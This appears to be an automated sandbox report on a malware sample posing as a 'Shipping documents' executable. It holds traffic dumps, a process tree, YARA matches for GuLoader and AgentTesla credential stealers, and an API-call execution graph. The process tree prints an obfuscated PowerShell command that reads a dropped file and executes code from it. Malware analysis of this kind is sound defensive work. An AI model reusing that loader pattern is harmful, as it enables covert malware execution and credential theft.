                                    Data Raw: af 31 b0 7f 34 ba 60 65 84 61 98 d6 94 de 28 30 e0 c7 07 b8 38 a4 38 93 86 88 a7 5e 57 72 74 07 c4 8c 64 c9 f4 a4 a5 05 b9 fe c8 32 9f 34 84 7b 73 f4 3f af f8 68 6c f9 76 dd 7c 1e 31 54 27 db 40 7d a1 af bf 42 c0 17 42 81 c0 60 4f b3 51 b8 e1 32 6b 2c 75 f0 21 f7 28 ed 42 68 f6 0f 99 b7 8b 48 bd 12 ff 1f d3 de e6 13 54 7d 00 da 07 2b de 68 cd a0 41 3a c0 f0 ca dd f4 1a 81 74 5f e2 90 db 53 c8 d4 76 98 e9 5d 8a b6 8d 35 74 bf d3 e7 7f 54 7d 60 39 90 b9 44 77 42 18 92 e5 32 09 e1 d7 9c 12 8e 21 62 58 34 f2 b5 a2 48 e6 db 1e 49 e5 8a ed b7 17 ec 59 f2 b5 65 44 c7 22 26 32 87 10 45 7e 4a 84 79 14 c8 0f 67 88 f8 45 69 a3 7d 4c 71 6d 46 65 5c ca 9d 57 6a 4f 94 bc 26 aa fc e4 59 41 4f ce c1 4e 02 45 4a 05 1a 04 2c e9 e0 7b 8f 51 64 09 fa 92 6d 09 6b c4 82 86 07 19 fe 42 b4 f6 a8 e0 fa a5 58 ab a8 ef fc 2f 36 c5 1a f5 61 63 71 50 b6 21 d9 06 7e 53 b7 2a 06 ba a6 64 0e f3 22 7c 88 35 16 b7 fd 33 22 78 c2 8f 32 6e d8 6e 17 02 6b e8 c8 08 81 31 a8 f4 bd 2e 71 11 25 50 6f 52 38 ed 1c c1 ce 9b 0d 6a e4 72 d5 f2 [TRUNCATED]
                                    Data Ascii: 14`ea(088^Wrtd24{s?hlv|1T'@}BB`OQ2k,u!(BhHT}+hA:t_Sv]5tT}`9DwB2!bX4HIYeD"&2E~JygEi}LqmFe\WjO&YAONEJ,{QdmkBX/6acqP!~S*d"|53"x2nnk1.q%PoR8jr\;=u*d8T?N TWEhS1xjGj[^Z^J$&f%.6Y@xL#E*;/k}|0YJ2uHZEoK3v&x 7QBOA1?gQ#2H2dmD%?&EAsNKedR=7-p[l+ZgEySr:s25.$aE]_16~+AK|USf/uZ9YFY%qItWh++<a\T&t'J qP@8>/A&VzgqC!lNOr`=hgbs/v$;|e*)N(OThNI j2M;s07q1kTszcUU0tTHhEG0H^c%]r]0ee!4cZy<fq Q4[r%!nZe46kd|I#
                                    Sep 27, 2024 18:34:24.433130026 CEST1236INData Raw: 86 63 d5 df 93 9c e1 aa f8 40 33 9d 4d 71 05 90 93 e5 76 ca ef af e8 37 99 a4 68 ff ab ad 4a fd f5 28 77 14 4f cf d9 9f 5d ca fb 9e ef 67 00 5e 6d a9 f3 8c b9 d1 c9 bf c5 2b 22 6d 3f e3 bb 19 b7 25 17 6e 79 70 ba 0b 30 61 dc 04 38 a5 00 d9 70 de
                                    Data Ascii: c@3Mqv7hJ(wO]g^m+"m?%nyp0a8p2Ve=Vxi*KpDZj%'L{9_)hz6xbrOz&6vRJ{Z&[rD(;|1L=JI</'K
                                    Sep 27, 2024 18:34:24.433163881 CEST448INData Raw: 54 ee af 81 13 b1 50 8d 23 88 aa c7 47 02 1c 92 b9 af e1 c6 20 b3 4f 35 d9 98 ba c6 7b c1 62 bb 4e 54 83 16 e4 8c ab cf aa aa 62 59 e2 35 89 b5 82 5d f6 15 8a b1 a2 c0 04 39 8e bf e6 3e a9 af 3c 15 37 f3 c6 3c 1a 96 6b aa 69 ed 30 c2 50 c8 74 8d
                                    Data Ascii: TP#G O5{bNTbY5]9><7<ki0Ptl 7#gBOk3}e,l#6[2no%`?F`EQ3_K/wRM+ZEnP0ZE8?ySg2}+h:mddezJZJ-"hX2(
                                    Sep 27, 2024 18:34:24.433192968 CEST1236INData Raw: 28 1c 97 15 e4 7c 81 4b 3e 3b f4 1a 6a 8b 8c c4 a8 04 5c e5 08 a3 0b a3 a4 91 85 b4 a6 c4 46 57 48 1b 3e 47 a5 c3 39 bb 43 79 58 ef b6 3b 2b 61 05 ef 9f a2 73 3d 17 26 ed ea 00 d5 fc 92 af c9 df 4a aa ab ad 39 ac cf 80 8e e2 bb 33 32 e0 85 21 11
                                    Data Ascii: (|K>;j\FWH>G9CyX;+as=&J932!<sYaeqP0#L1=9-JZ&(\4qemwJBn+"91[%VQs]i)D\l3$*_b*'CX\p"[S10n|\+
                                    Sep 27, 2024 18:34:24.433226109 CEST1236INData Raw: 4a c1 82 4f f3 ec a3 3a fd 9c 8e f1 86 d6 43 de 6b 88 b3 11 ac 57 0f 35 7b 21 92 de 6e 96 cf 45 11 03 b4 09 be f7 8e 48 f6 98 58 f7 b1 5c fb 4c e7 93 a5 0c cd db 86 df ef 05 4e e8 6f a3 9c e9 95 9a 08 b2 02 30 f1 a1 68 b8 27 9e b1 8b cf d6 08 df
                                    Data Ascii: JO:CkW5{!nEHX\LNo0h'iyRy!E,`cos|xkq3v)08Dr0m62>>"DQei3=g{Xnj11DB9RAqK
                                    Sep 27, 2024 18:34:24.433258057 CEST448INData Raw: 45 db 03 2b c3 8a 59 a4 45 1a 4a 7d d8 7e c5 45 f5 1d 97 2f 77 6a 73 43 15 37 7d da 46 11 81 47 2e 19 3c 65 f7 66 d1 2a 56 6b 34 f6 8c 36 fc 38 1c 29 f8 56 30 51 2b e4 0a 21 a8 00 3e 0e 87 9a 6d 39 48 a7 42 1e 89 73 f9 2f e9 81 a8 4e 37 c4 75 2c
                                    Data Ascii: E+YEJ}~E/wjsC7}FG.<ef*Vk468)V0Q+!>m9HBs/N7u,ST?!238xf^ n7nYV7N3Q3Jpg>c7~hb-E&p^L`|07Vi:g=Z&:KR;y8K^):O'5Bg4
                                    Sep 27, 2024 18:34:24.513298035 CEST1236INData Raw: 21 d9 2e 68 53 b5 20 b8 31 a2 64 e0 fe 26 6c fa 20 16 b7 9d 1b 35 68 c2 85 90 90 d4 6d 07 22 6f e8 c8 08 f3 52 a8 f4 cd 8c 1b d8 25 50 10 4a 38 ed 16 53 a2 9b 4b 1f cc 7b d5 f2 e4 09 55 3b ba 4f da 75 2a c3 4c ce 38 c6 a2 f9 43 f5 33 c6 93 55 9a
                                    Data Ascii: !.hS 1d&l 5hm"oR%PJ8SK{U;Ou*L8C3U tWaXmSCxBBj{HP!XVsfgd6%"wPLPfs#*[;WE{}vd5Y1uQL;
                                    Sep 27, 2024 18:34:24.513334990 CEST1236INData Raw: 06 7e 76 b8 ac ca a1 7d 4b 90 b6 26 cf 37 46 d0 6e 95 b6 30 34 10 cd 49 61 63 2a 1f 17 23 f9 8e b8 a1 f2 80 2e b7 f6 67 0c b6 ea 9f 1a fe 5c 6b 2e f8 4f e5 bd 40 f9 45 89 8b db e4 54 5c 8d c0 53 3e 0b 06 b5 ca fb e7 33 bd 5e db 67 6e e2 52 fe 17
                                    Data Ascii: ~v}K&7Fn04Iac*#.g\k.O@ET\S>3^gnRTXNYEKDyEh#pjL7}F<a(VK66)$6w1w7/">pm,B([7p&rP?=2Cl/^B*7dY:B3f#Jp>2ac7t
                                    Sep 27, 2024 18:34:24.513367891 CEST448INData Raw: b4 88 13 33 32 c4 a0 3f 13 eb 18 a8 73 5d 4a d9 8c 67 d7 f8 95 9f ed 97 08 05 ce 64 99 ae fa b5 12 01 4b 4c 34 3d 67 95 19 5a 3b 85 3e 2f 46 fc f5 08 75 14 b0 cf ab 18 5f ca 8b bc 4f 62 ff 5e 6d 57 7d 8f 39 d1 b7 33 c6 2b 02 e1 c0 e3 3b e7 49 1c
                                    Data Ascii: 32?s]JgdKL4=gZ;>/Fu_Ob^mW}93+;IpiPko-dvN1c$"hCp!Z1:JhsY0>9<(B6xFaOz){@y-iE($U:4mIm_%`
                                    Sep 27, 2024 18:34:24.513400078 CEST1236INData Raw: 90 bf 43 3b 67 0f 24 9c 03 0e a5 cb 40 9e 02 48 0f 9f bf 60 2c 20 f2 05 31 19 99 9e cd f6 b6 86 4d e4 1b 5b 02 46 2c fa 3d 63 8e e6 7b e5 63 c7 25 eb c4 71 ff 03 7f 43 06 91 22 70 56 ee cf e2 ee 45 e9 e2 d2 3e 57 63 10 73 42 18 41 f8 ac c8 16 33
                                    Data Ascii: C;g$@H`, 1M[F,=c{c%qC"pVE>WcsBA3s)H^xF>}S/34Hgc#k$kgV)O`Ew#j>U"4VgjTX>[AZEJ~>|jM6D9J <Eg/vk4:$0{0/>m
                                    Sep 27, 2024 18:34:24.513457060 CEST224INData Raw: f9 6e 88 62 6b b6 26 31 f5 7a 81 5d fc c9 0a ea a8 08 bd 37 e2 0d 9a ec 3e 4b d8 70 74 89 fd e1 b9 04 58 cb 58 c7 0b de 71 b9 c5 b0 8c d0 c4 3e ee 1b 3a 31 1e e3 3b c8 16 9f 58 ef b8 91 26 63 7e 4c ed c4 74 17 45 0c ae 97 a7 df 7c 82 85 d7 d9 27
                                    Data Ascii: nbk&1z]7>KptXXq>:1;X&c~LtE|'=cs5w/9$`(bL47 B?BJu1wu]{og,sI?YDYH%npa#eah/UD3&$gk8w(apZ{


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.549715104.26.13.2054433876C:\Windows\SysWOW64\msiexec.exe
                                    TimestampBytes transferredDirectionData
                                    2024-09-27 16:34:25 UTC155OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                    Host: api.ipify.org
                                    Connection: Keep-Alive
                                    2024-09-27 16:34:25 UTC211INHTTP/1.1 200 OK
                                    Date: Fri, 27 Sep 2024 16:34:25 GMT
                                    Content-Type: text/plain
                                    Content-Length: 11
                                    Connection: close
                                    Vary: Origin
                                    CF-Cache-Status: DYNAMIC
                                    Server: cloudflare
                                    CF-RAY: 8c9ce6af1aa8c343-EWR
                                    2024-09-27 16:34:25 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                    Data Ascii: 8.46.123.33


                                    Click to jump to process

                                    Click to jump to process

                                    Click to dive into process behavior distribution

                                    Click to jump to process

                                    Target ID:0
                                    Start time:12:32:57
                                    Start date:27/09/2024
                                    Path:C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe"
                                    Imagebase:0x400000
                                    File size:1'081'112 bytes
                                    MD5 hash:94C700B33FB2A1AA2BD02F13750CCA75
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:1
                                    Start time:12:32:58
                                    Start date:27/09/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"powershell.exe" -windowstyle minimized "$Mahjongg=Get-Content 'C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Laccolitic51.Suk151';$Chefen128=$Mahjongg.SubString(11975,3);.$Chefen128($Mahjongg)"
                                    Imagebase:0x1b0000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2916363321.000000000C87B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:true

                                    Target ID:2
                                    Start time:12:32:58
                                    Start date:27/09/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6d64d0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:12:34:10
                                    Start date:27/09/2024
                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\syswow64\msiexec.exe"
                                    Imagebase:0xb40000
                                    File size:59'904 bytes
                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3309605845.0000000024C59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3309605845.0000000024C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3309605845.0000000024C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high
                                    Has exited:false

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:23.7%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:27.6%
                                      Total number of Nodes:1523
                                      Total number of Limit Nodes:38
                                      execution_graph 4093 401c41 4094 403002 16 API calls 4093->4094 4095 401c4a 4094->4095 4096 403002 16 API calls 4095->4096 4097 401c53 4096->4097 4100 40661f wsprintfW 4097->4100 4099 401cdb 4100->4099 4101 402b42 4102 402b48 4101->4102 4103 402b50 FindNextFileW 4102->4103 4104 4018be 4102->4104 4103->4104 4105 4024c2 4106 40303e 16 API calls 4105->4106 4107 4024c8 4106->4107 4108 40303e 16 API calls 4107->4108 4109 4024d1 4108->4109 4110 40303e 16 API calls 4109->4110 4111 4024da 4110->4111 4112 4065cf 2 API calls 4111->4112 4116 4024e2 4112->4116 4113 4024f3 lstrlenW lstrlenW 4115 405d3a 23 API calls 4113->4115 4114 405d3a 23 API calls 4114->4116 4117 40253a SHFileOperationW 4115->4117 4116->4113 4116->4114 4118 402ea1 4116->4118 4117->4116 4117->4118 4119 402048 4120 403002 16 API calls 4119->4120 4121 40204e 4120->4121 4122 403002 16 API calls 4121->4122 4123 402057 4122->4123 4124 402061 ShowWindow 4123->4124 4125 40206c EnableWindow 4123->4125 4126 402ea1 4124->4126 4125->4126 4127 403d48 4128 403d53 4127->4128 4129 403d57 4128->4129 4130 403d5a GlobalAlloc 4128->4130 4130->4129 3614 7347114e 3689 73471a8f GetCurrentProcess GetModuleHandleA lstrcpyA GetProcAddress 3614->3689 3617 73471197 GetModuleFileNameW GlobalAlloc 3620 734711e9 3617->3620 3618 73471304 GlobalAlloc 3619 7347132d 3618->3619 3621 73471346 FindWindowExW FindWindowExW 3619->3621 3635 73471365 3619->3635 3622 734711ee CharPrevW 3620->3622 3623 7347120a 3620->3623 3621->3635 3622->3620 3622->3623 3624 73471231 GetTempFileNameW CopyFileW 3623->3624 3625 7347121b 3623->3625 3628 73471267 CreateFileW CreateFileMappingW MapViewOfFile 3624->3628 3629 734712d9 lstrcatW lstrlenW 3624->3629 3704 73471dd8 3625->3704 3631 734712a4 UnmapViewOfFile 3628->3631 3632 734712cf CloseHandle CloseHandle 3628->3632 3629->3619 3630 73471225 GlobalFree 3634 73471a2a 3630->3634 3631->3632 3632->3629 3636 73471397 lstrcmpiW 3635->3636 3694 73471d96 3635->3694 3699 73471d07 lstrlenW lstrlenW 3635->3699 3636->3635 3637 734713ae lstrcmpiW 3636->3637 3637->3635 3638 734713c4 3637->3638 3639 734713f6 3638->3639 3640 734713cb 3638->3640 3643 73471411 GetVersion 3639->3643 3641 73471dd8 2 API calls 3640->3641 3642 734713d5 3641->3642 3642->3630 3646 734713ea DeleteFileW 3642->3646 3644 73471482 GlobalAlloc 3643->3644 3645 734714da 3643->3645 3647 734714b7 lstrcpyW 3644->3647 3648 734714d1 3644->3648 3649 73471529 CreatePipe 3645->3649 3650 734714f9 InitializeSecurityDescriptor SetSecurityDescriptorDacl 3645->3650 3646->3630 3651 7347194a 3647->3651 3648->3645 3649->3647 3652 73471549 CreatePipe 3649->3652 3650->3649 3653 73471962 3651->3653 3654 7347196a 3651->3654 3652->3647 3655 73471565 GetStartupInfoW CreateProcessW 3652->3655 3656 73471dd8 2 API calls 3653->3656 3657 73471987 3654->3657 3660 7347197b 3654->3660 3655->3647 3658 734715cc GetTickCount 3655->3658 3659 73471968 3656->3659 3661 734719a5 3657->3661 3662 73471992 lstrcpyW 3657->3662 3674 734715da 3658->3674 3659->3657 3663 73471b08 3 API calls 3660->3663 3664 734719c7 3661->3664 3665 734719b0 wsprintfW 3661->3665 3662->3661 3663->3659 3666 73471dd8 2 API calls 3664->3666 3665->3664 3667 734719d4 6 API calls 3666->3667 3669 73471a05 3667->3669 3668 734715e2 WaitForSingleObject GetExitCodeProcess 3670 73471600 PeekNamedPipe 3668->3670 3671 73471a13 DeleteFileW 3669->3671 3672 73471a1a GlobalFree 3669->3672 3673 73471620 GetTickCount ReadFile 3670->3673 3670->3674 3671->3672 3672->3634 3675 73471a27 GlobalFree 3672->3675 3688 7347166d 3673->3688 3674->3651 3674->3668 3677 7347193d Sleep 3674->3677 3678 7347190d GetTickCount 3674->3678 3675->3634 3676 73471671 IsTextUnicode 3676->3688 3677->3674 3678->3677 3679 7347191d TerminateProcess lstrcpyW 3678->3679 3679->3674 3680 7347170b IsDBCSLeadByteEx 3680->3688 3681 73471732 MultiByteToWideChar 3681->3688 3682 7347177e lstrcpyW 3682->3688 3683 7347181c GlobalReAlloc 3684 734718d5 lstrcpyW 3683->3684 3683->3688 3684->3674 3687 73471894 CharNextExA 3687->3668 3687->3688 3688->3668 3688->3670 3688->3674 3688->3676 3688->3680 3688->3681 3688->3682 3688->3683 3688->3687 3707 73471b08 3688->3707 3710 73471bcb 3688->3710 3690 73471ae4 GetProcAddress 3689->3690 3691 73471aca 3689->3691 3692 73471af7 3690->3692 3693 7347118f 3690->3693 3691->3690 3691->3693 3692->3693 3693->3617 3693->3618 3695 73471da1 3694->3695 3696 73471dd1 3694->3696 3695->3696 3697 73471dc2 GlobalFree 3695->3697 3698 73471dae lstrcpyW 3695->3698 3696->3635 3697->3696 3698->3697 3700 73471d5c 3699->3700 3701 73471d26 3699->3701 3700->3635 3701->3700 3714 73471b68 3701->3714 3703 73471d4e lstrlenW 3703->3700 3703->3701 3705 73471de1 GlobalAlloc lstrcpynW 3704->3705 3706 73471e20 3704->3706 3705->3706 3706->3630 3708 73471b17 SendMessageW SendMessageW SendMessageW 3707->3708 3709 73471b66 3707->3709 3708->3709 3709->3688 3711 73471c44 3710->3711 3712 73471bdb 3710->3712 3711->3688 3712->3711 3713 73471b68 CharNextW 3712->3713 3713->3712 3715 73471b75 3714->3715 3716 73471b79 3714->3716 3715->3703 3717 73471bbc CharNextW 3716->3717 3718 73471bb7 3716->3718 3717->3718 3718->3703 4131 401ecc 4132 403002 16 API calls 4131->4132 4133 401eda SetWindowLongW 4132->4133 4134 402ea1 4133->4134 4135 40364f 4136 403661 SetTimer 4135->4136 4137 403675 4135->4137 4139 40367e MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4136->4139 4138 4036cc 4137->4138 4137->4139 4139->4138 4140 40234f 4141 40303e 16 API calls 4140->4141 4142 402356 4141->4142 4143 40303e 16 API calls 4142->4143 4144 402361 4143->4144 4145 40303e 16 API calls 4144->4145 4146 40236e 4145->4146 4147 40303e 16 API calls 4146->4147 4148 402379 4147->4148 4149 40303e 16 API calls 4148->4149 4151 402384 4149->4151 4150 4023c4 CoCreateInstance 4155 4023e8 4150->4155 4151->4150 4152 40303e 16 API calls 4151->4152 4152->4150 4153 405d3a 23 API calls 4154 4024ba 4153->4154 4155->4153 4156 4058d0 4157 4058e5 4156->4157 4158 4058f9 4156->4158 4159 4058eb 4157->4159 4160 40593e CallWindowProcW 4157->4160 4161 405901 IsWindowVisible 4158->4161 4166 405918 4158->4166 4162 4054e8 SendMessageW 4159->4162 4164 4058f5 4160->4164 4161->4160 4163 40590e 4161->4163 4162->4164 4168 4056da SendMessageW 4163->4168 4166->4160 4173 4054b6 4166->4173 4169 405739 SendMessageW 4168->4169 4170 4056fb GetMessagePos ScreenToClient SendMessageW 4168->4170 4171 405731 4169->4171 4170->4171 4172 405736 4170->4172 4171->4166 4172->4169 4182 406b1a lstrcpynW 4173->4182 4175 4054c9 4183 40661f wsprintfW 4175->4183 4177 4054d3 4178 401533 89 API calls 4177->4178 4179 4054dc 4178->4179 4184 406b1a lstrcpynW 4179->4184 4181 4054e3 4181->4160 4182->4175 4183->4177 4184->4181 4185 402dd1 4186 402df2 4185->4186 4187 402dd9 4185->4187 4188 4068e6 5 API calls 4186->4188 4189 403002 16 API calls 4187->4189 4193 402e72 4187->4193 4190 402e2a 4188->4190 4191 402de9 4189->4191 4192 40303e 16 API calls 4190->4192 4194 403002 16 API calls 4191->4194 4195 402e33 4192->4195 4194->4186 4195->4193 4196 402e37 IIDFromString 4195->4196 4196->4193 4197 402e47 4196->4197 4197->4193 4200 406b1a lstrcpynW 4197->4200 4199 402e66 CoTaskMemFree 4199->4193 4200->4199 4201 405655 lstrcpynW lstrlenW 3574 402656 3575 40303e 16 API calls 3574->3575 3576 40266d 3575->3576 3577 40303e 16 API calls 3576->3577 3578 402678 3577->3578 3593 4062a5 3578->3593 3581 402ea5 3582 4026d1 3585 4026e7 3582->3585 3586 4026d8 3582->3586 3583 4026bb 3584 40303e 16 API calls 3583->3584 3587 4026c2 lstrlenW 3584->3587 3589 402700 RegSetValueExW 3585->3589 3590 403148 30 API calls 3585->3590 3588 403002 16 API calls 3586->3588 3587->3589 3592 4026df 3588->3592 3591 40271c RegCloseKey 3589->3591 3590->3592 3591->3581 3592->3589 3594 4062b4 3593->3594 3595 4062bd RegCreateKeyExW 3594->3595 3596 402697 3594->3596 3595->3596 3596->3581 3596->3582 3596->3583 4047 40225d 4048 40226e 4047->4048 4059 402335 4047->4059 4049 40303e 16 API calls 4048->4049 4051 402275 4049->4051 4050 405d3a 23 API calls 4054 40234a 4050->4054 4052 40303e 16 API calls 4051->4052 4053 402281 4052->4053 4055 40228b GetModuleHandleW 4053->4055 4056 40229c LoadLibraryExW 4053->4056 4057 4022b0 4055->4057 4058 402298 4055->4058 4056->4057 4056->4059 4068 406269 4057->4068 4058->4056 4059->4050 4062 4022c4 4065 405d3a 23 API calls 4062->4065 4066 4022da 4062->4066 4063 402306 4064 405d3a 23 API calls 4063->4064 4064->4066 4065->4066 4066->4054 4067 402329 FreeLibrary 4066->4067 4067->4054 4073 406469 WideCharToMultiByte 4068->4073 4070 406286 4071 40628d GetProcAddress 4070->4071 4072 4022ba 4070->4072 4071->4072 4072->4062 4072->4063 4073->4070 4202 402cde 4203 403002 16 API calls 4202->4203 4204 402b21 4203->4204 4204->4202 4205 402d10 4204->4205 4210 401709 4204->4210 4206 402d35 4205->4206 4207 402d25 4205->4207 4209 405eba 16 API calls 4206->4209 4208 403002 16 API calls 4207->4208 4208->4210 4209->4210 4211 40285f 4212 402883 4211->4212 4213 402899 4211->4213 4214 403002 16 API calls 4212->4214 4215 4028c3 4213->4215 4216 40289e 4213->4216 4224 402889 4214->4224 4218 40303e 16 API calls 4215->4218 4217 40303e 16 API calls 4216->4217 4219 4028a5 4217->4219 4220 4028ca lstrlenW 4218->4220 4228 406469 WideCharToMultiByte 4219->4228 4220->4224 4221 402910 4223 4028b5 lstrlenA 4223->4224 4224->4221 4225 4028fc 4224->4225 4229 406484 SetFilePointer 4224->4229 4225->4221 4226 406a0b WriteFile 4225->4226 4226->4221 4228->4223 4230 4064a0 4229->4230 4237 4064bb 4229->4237 4231 406948 ReadFile 4230->4231 4232 4064ac 4231->4232 4233 4064c4 SetFilePointer 4232->4233 4234 4064ec SetFilePointer 4232->4234 4232->4237 4233->4234 4235 4064cf 4233->4235 4234->4237 4236 406a0b WriteFile 4235->4236 4236->4237 4237->4225 4238 401ce0 4239 40303e 16 API calls 4238->4239 4240 401ce7 4239->4240 4241 403002 16 API calls 4240->4241 4242 401cf0 wsprintfW 4241->4242 4243 402ea1 4242->4243 4244 73471a62 4247 7347114e 4244->4247 4248 73471a8f 5 API calls 4247->4248 4249 7347118f 4248->4249 4250 73471197 GetModuleFileNameW GlobalAlloc 4249->4250 4251 73471304 GlobalAlloc 4249->4251 4253 734711e9 4250->4253 4252 7347132d 4251->4252 4254 73471346 FindWindowExW FindWindowExW 4252->4254 4268 73471365 4252->4268 4255 734711ee CharPrevW 4253->4255 4256 7347120a 4253->4256 4254->4268 4255->4253 4255->4256 4257 73471231 GetTempFileNameW CopyFileW 4256->4257 4258 7347121b 4256->4258 4261 73471267 CreateFileW CreateFileMappingW MapViewOfFile 4257->4261 4262 734712d9 lstrcatW lstrlenW 4257->4262 4260 73471dd8 2 API calls 4258->4260 4259 73471d96 2 API calls 4259->4268 4263 73471225 GlobalFree 4260->4263 4264 734712a4 UnmapViewOfFile 4261->4264 4265 734712cf CloseHandle CloseHandle 4261->4265 4262->4252 4267 73471a2a 4263->4267 4264->4265 4265->4262 4266 73471d07 4 API calls 4266->4268 4268->4259 4268->4266 4269 73471397 lstrcmpiW 4268->4269 4269->4268 4270 734713ae lstrcmpiW 4269->4270 4270->4268 4271 734713c4 4270->4271 4272 734713f6 4271->4272 4273 734713cb 4271->4273 4276 73471411 GetVersion 4272->4276 4274 73471dd8 2 API calls 4273->4274 4275 734713d5 4274->4275 4275->4263 4279 734713ea DeleteFileW 4275->4279 4277 73471482 GlobalAlloc 4276->4277 4278 734714da 4276->4278 4280 734714b7 lstrcpyW 4277->4280 4281 734714d1 4277->4281 4282 73471529 CreatePipe 4278->4282 4283 734714f9 InitializeSecurityDescriptor SetSecurityDescriptorDacl 4278->4283 4279->4263 4284 7347194a 4280->4284 4281->4278 4282->4280 4285 73471549 CreatePipe 4282->4285 4283->4282 4286 73471962 4284->4286 4287 7347196a 4284->4287 4285->4280 4288 73471565 GetStartupInfoW CreateProcessW 4285->4288 4289 73471dd8 2 API calls 4286->4289 4290 73471987 4287->4290 4293 7347197b 4287->4293 4288->4280 4291 734715cc GetTickCount 4288->4291 4292 73471968 4289->4292 4294 734719a5 4290->4294 4295 73471992 lstrcpyW 4290->4295 4307 734715da 4291->4307 4292->4290 4296 73471b08 3 API calls 4293->4296 4297 734719c7 4294->4297 4298 734719b0 wsprintfW 4294->4298 4295->4294 4296->4292 4299 73471dd8 2 API calls 4297->4299 4298->4297 4300 734719d4 6 API calls 4299->4300 4302 73471a05 4300->4302 4301 734715e2 WaitForSingleObject GetExitCodeProcess 4303 73471600 PeekNamedPipe 4301->4303 4304 73471a13 DeleteFileW 4302->4304 4305 73471a1a GlobalFree 4302->4305 4306 73471620 GetTickCount ReadFile 4303->4306 4303->4307 4304->4305 4305->4267 4308 73471a27 GlobalFree 4305->4308 4321 7347166d 4306->4321 4307->4284 4307->4301 4310 7347193d Sleep 4307->4310 4311 7347190d GetTickCount 4307->4311 4308->4267 4309 73471671 IsTextUnicode 4309->4321 4310->4307 4311->4310 4312 7347191d TerminateProcess lstrcpyW 4311->4312 4312->4307 4313 7347170b IsDBCSLeadByteEx 4313->4321 4314 73471732 MultiByteToWideChar 4314->4321 4315 7347177e lstrcpyW 4315->4321 4316 7347181c GlobalReAlloc 4317 734718d5 lstrcpyW 4316->4317 4316->4321 4317->4307 4318 73471b08 3 API calls 4318->4321 4319 73471bcb CharNextW 4319->4321 4320 73471894 CharNextExA 4320->4301 4320->4321 4321->4301 4321->4303 4321->4307 4321->4309 4321->4313 4321->4314 4321->4315 4321->4316 4321->4318 4321->4319 4321->4320 4322 402566 4323 402574 4322->4323 4324 40256e 4322->4324 4326 402585 4323->4326 4328 40303e 16 API calls 4323->4328 4325 40303e 16 API calls 4324->4325 4325->4323 4327 402594 4326->4327 4329 40303e 16 API calls 4326->4329 4330 40303e 16 API calls 4327->4330 4328->4326 4329->4327 4331 40259d WritePrivateProfileStringW 4330->4331 4332 402d69 4333 403002 16 API calls 4332->4333 4335 402d6f 4333->4335 4334 405eba 16 API calls 4336 401709 4334->4336 4335->4334 4335->4336 4337 401eea 4338 401ef4 4337->4338 4339 401efe GetDlgItem 4337->4339 4341 403002 16 API calls 4338->4341 4340 401efb 4339->4340 4342 401f3c GetClientRect LoadImageW SendMessageW 4340->4342 4343 40303e 16 API calls 4340->4343 4341->4340 4345 401f9c 4342->4345 4347 401fa7 4342->4347 4343->4342 4346 401fa0 DeleteObject 4345->4346 4345->4347 4346->4347 4348 40216c 4349 40303e 16 API calls 4348->4349 4350 402173 4349->4350 4351 4065cf 2 API calls 4350->4351 4352 402179 4351->4352 4353 402188 4352->4353 4355 40661f wsprintfW 4352->4355 4355->4353 4356 404eec 4357 404f22 4356->4357 4358 404efc 4356->4358 4359 40575b 8 API calls 4357->4359 4360 40551a 17 API calls 4358->4360 4361 404f2e 4359->4361 4362 404f09 SetDlgItemTextW 4360->4362 4362->4357 4363 401aec 4364 401aa2 4363->4364 4367 401ab1 4363->4367 4365 40303e 16 API calls 4364->4365 4366 401aa7 4365->4366 4368 406719 65 API calls 4366->4368 4368->4367 4369 401af0 4370 40303e 16 API calls 4369->4370 4371 401af7 lstrlenW 4370->4371 4372 401afd 4371->4372 4373 40303e 16 API calls 4372->4373 4375 402855 4372->4375 4376 40691b GetFileAttributesW CreateFileW 4372->4376 4373->4372 4376->4372 4377 402b75 4378 40303e 16 API calls 4377->4378 4379 402b7c FindFirstFileW 4378->4379 4380 402b90 4379->4380 4383 40661f wsprintfW 4380->4383 4382 402b67 4383->4382 4384 402af5 4385 402afc 4384->4385 4396 401709 4384->4396 4386 403002 16 API calls 4385->4386 4387 402b03 4386->4387 